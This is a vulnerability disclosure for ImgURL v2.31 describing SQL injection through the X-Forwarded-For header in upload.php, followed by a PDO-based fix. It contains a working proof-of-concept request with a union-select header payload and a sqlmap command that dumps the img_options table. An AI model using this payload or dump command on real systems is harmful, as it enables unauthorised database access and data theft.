Multiple ways are used to obtain the user IP.
The user IP is then spliced directly into the SQL statement in lines 44 to 58 of upload.php.
query->uplimit($ip)
Proof of Concept
GET /upload/localhost HTTP/1.1
Host: host.local
Cookie: XSRF-TOKEN=[Your_XSRF-TOKEN];
x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc-- 
Connection: close
Command for injection using sqlmap
python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img_options -D values --dump
Repair method
Check the user IP format or use PDO to prevent SQL injection
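Both repair options combined, as an added example that is not ImgURL's own code: the client-supplied address is validated with `filter_var` and then bound as a PDO parameter instead of being concatenated. The `uploads` table, its columns, and the function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed schema for illustration; the real table and column names are not shown in the report.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE uploads (id INTEGER PRIMARY KEY, ip TEXT NOT NULL, day TEXT NOT NULL)');
$pdo->exec("INSERT INTO uploads (ip, day) VALUES ('203.0.113.7', date('now')), ('203.0.113.7', date('now'))");

/** Return the value only if it is one syntactically valid IPv4/IPv6 address. */
function validated_ip(string $raw): ?string
{
    // A comma-separated proxy chain or any SQL fragment fails this check.
    $ip = filter_var(trim($raw), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

/** Count today's uploads for an address; the value is bound, never concatenated. */
function uploads_today(PDO $pdo, string $ip): int
{
    $stmt = $pdo->prepare("SELECT COUNT(*) FROM uploads WHERE ip = :ip AND day = date('now')");
    $stmt->execute([':ip' => $ip]);
    return (int) $stmt->fetchColumn();
}

/** Decide whether another upload is allowed for this client-supplied address. */
function upload_allowed(PDO $pdo, string $rawIp, int $limit): bool
{
    $ip = validated_ip($rawIp);
    if ($ip === null) {
        return false; // reject malformed addresses instead of querying with them
    }
    return uploads_today($pdo, $ip) < $limit;
}

// Constructed inputs: one well-formed address and the header value from the report above.
$samples = [
    '203.0.113.7',
    "' union select case(2>1)when(1)then(10)else(0)end order by num desc-- ",
];
foreach ($samples as $raw) {
    printf("%-24.24s allowed=%s\n", $raw, var_export(upload_allowed($pdo, $raw, 5), true));
}

// Even if validation were skipped, the bound value is compared as a plain string.
var_dump(uploads_today($pdo, $samples[1]));
```

Validation and binding stop the injection, but `X-Forwarded-For` stays client-controlled unless a trusted proxy sets it, so a limit keyed on it can still be evaded by changing the header.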
Description
imgurl v2.31